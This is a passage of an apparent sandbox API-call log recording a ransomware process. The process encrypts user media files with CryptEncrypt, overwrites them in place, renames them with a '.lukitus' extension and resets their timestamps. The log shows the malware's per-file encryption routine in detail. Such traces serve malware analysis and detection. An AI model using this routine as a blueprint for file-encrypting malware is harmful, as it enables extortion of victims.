ftLastWriteTime.dwLowDateTime=0xe4334260, ftLastWriteTime.dwHighDateTime=0x1d301fb, nFileSizeHigh=0x0, nFileSizeLow=0x3585)) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.433] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\YDhL-_Oa9J5GrHs.swf" (normalized: "c:\\users\\aetadzjz\\videos\\ydhl-_oa9j5grhs.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.433] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\YDhL-_Oa9J5GrHs.swf" (normalized: "c:\\users\\aetadzjz\\videos\\ydhl-_oa9j5grhs.swf"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\F56924BE-9663-41BB-113D17D0-3236FCFAE43F.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\f56924be-9663-41bb-113d17d0-3236fcfae43f.lukitus"), dwFlags=0x9) returned 1 [0109.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.435] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.440] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3585, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3585, lpOverlapped=0x0) returned 1 [0109.440] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.440] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3585, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3585, lpOverlapped=0x0) returned 1 [0109.440] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.440] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6540fef0, dwHighDateTime=0x1d31760)) [0109.441] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.441] FlushFileBuffers (hFile=0x328) returned 1 [0109.444] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\zmW_Fl42FVSkYv_yq.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\zmw_fl42fvskyv_yq.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9096c5e0, ftCreationTime.dwHighDateTime=0x1d2fe73, ftLastAccessTime.dwLowDateTime=0xb2f9aa30, ftLastAccessTime.dwHighDateTime=0x1d2fec3, ftLastWriteTime.dwLowDateTime=0xb2f9aa30, ftLastWriteTime.dwHighDateTime=0x1d2fec3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0a)) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.444] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\zmW_Fl42FVSkYv_yq.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\zmw_fl42fvskyv_yq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.444] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\zmW_Fl42FVSkYv_yq.mp4" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\zmw_fl42fvskyv_yq.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\dMOD_L2_N\\F56924BE-9663-41BB-451C9042-7ACDCA4814EF.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\dmod_l2_n\\f56924be-9663-41bb-451c9042-7acdca4814ef.lukitus"), dwFlags=0x9) returned 1 [0109.446] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.446] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.451] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x2c0a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x2c0a, lpOverlapped=0x0) returned 1 [0109.451] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.451] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x2c0a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x2c0a, lpOverlapped=0x0) returned 1 [0109.451] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.452] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65436050, dwHighDateTime=0x1d31760)) [0109.452] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.452] FlushFileBuffers (hFile=0x328) returned 1 [0109.456] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\Eq2x ys5Wy ICJP.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\eq2x ys5wy icjp.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7c947c0, ftCreationTime.dwHighDateTime=0x1d2fcd4, ftLastAccessTime.dwLowDateTime=0x313bc90, ftLastAccessTime.dwHighDateTime=0x1d2feb0, ftLastWriteTime.dwLowDateTime=0x313bc90, ftLastWriteTime.dwHighDateTime=0x1d2feb0, nFileSizeHigh=0x0, nFileSizeLow=0x3982)) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.456] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\Eq2x ys5Wy ICJP.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\eq2x ys5wy icjp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.457] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\Eq2x ys5Wy ICJP.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\eq2x ys5wy icjp.m4a"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\F56924BE-9663-41BB-D6925DAC-48972570B93F.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\f56924be-9663-41bb-d6925dac-48972570b93f.lukitus"), dwFlags=0x9) returned 1 [0109.458] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.458] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.464] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3982, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3982, lpOverlapped=0x0) returned 1 [0109.465] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.465] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3982, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3982, lpOverlapped=0x0) returned 1 [0109.465] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.465] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6545c1b0, dwHighDateTime=0x1d31760)) [0109.465] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.465] FlushFileBuffers (hFile=0x328) returned 1 [0109.468] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\fSOLDrtbCkwq.mkv" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\fsoldrtbckwq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9c32d50, ftCreationTime.dwHighDateTime=0x1d2f781, ftLastAccessTime.dwLowDateTime=0x8c3bd340, ftLastAccessTime.dwHighDateTime=0x1d304e1, ftLastWriteTime.dwLowDateTime=0x8c3bd340, ftLastWriteTime.dwHighDateTime=0x1d304e1, nFileSizeHigh=0x0, nFileSizeLow=0x14660)) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.469] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.469] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\fSOLDrtbCkwq.mkv" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\fsoldrtbckwq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.469] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\fSOLDrtbCkwq.mkv" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\fsoldrtbckwq.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\F56924BE-9663-41BB-80B53F29-CCF6DCD53775.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\f56924be-9663-41bb-80b53f29-ccf6dcd53775.lukitus"), dwFlags=0x9) returned 1 [0109.475] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.475] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.480] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14660, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14660, lpOverlapped=0x0) returned 1 [0109.481] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.481] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14660, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14660, lpOverlapped=0x0) returned 1 [0109.481] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.481] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65482310, dwHighDateTime=0x1d31760)) [0109.481] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.482] FlushFileBuffers (hFile=0x328) returned 1 [0109.485] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\zZG5e5YF\\HmCN--W\\2ZAx.swf" (normalized: "c:\\users\\aetadzjz\\desktop\\zzg5e5yf\\hmcn--w\\2zax.swf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce17e10, ftCreationTime.dwHighDateTime=0x1d3013c, ftLastAccessTime.dwLowDateTime=0xec20e310, ftLastAccessTime.dwHighDateTime=0x1d2fa58, ftLastWriteTime.dwLowDateTime=0xec20e310, ftLastWriteTime.dwHighDateTime=0x1d2fa58, nFileSizeHigh=0x0, nFileSizeLow=0x62ef)) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.485] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: 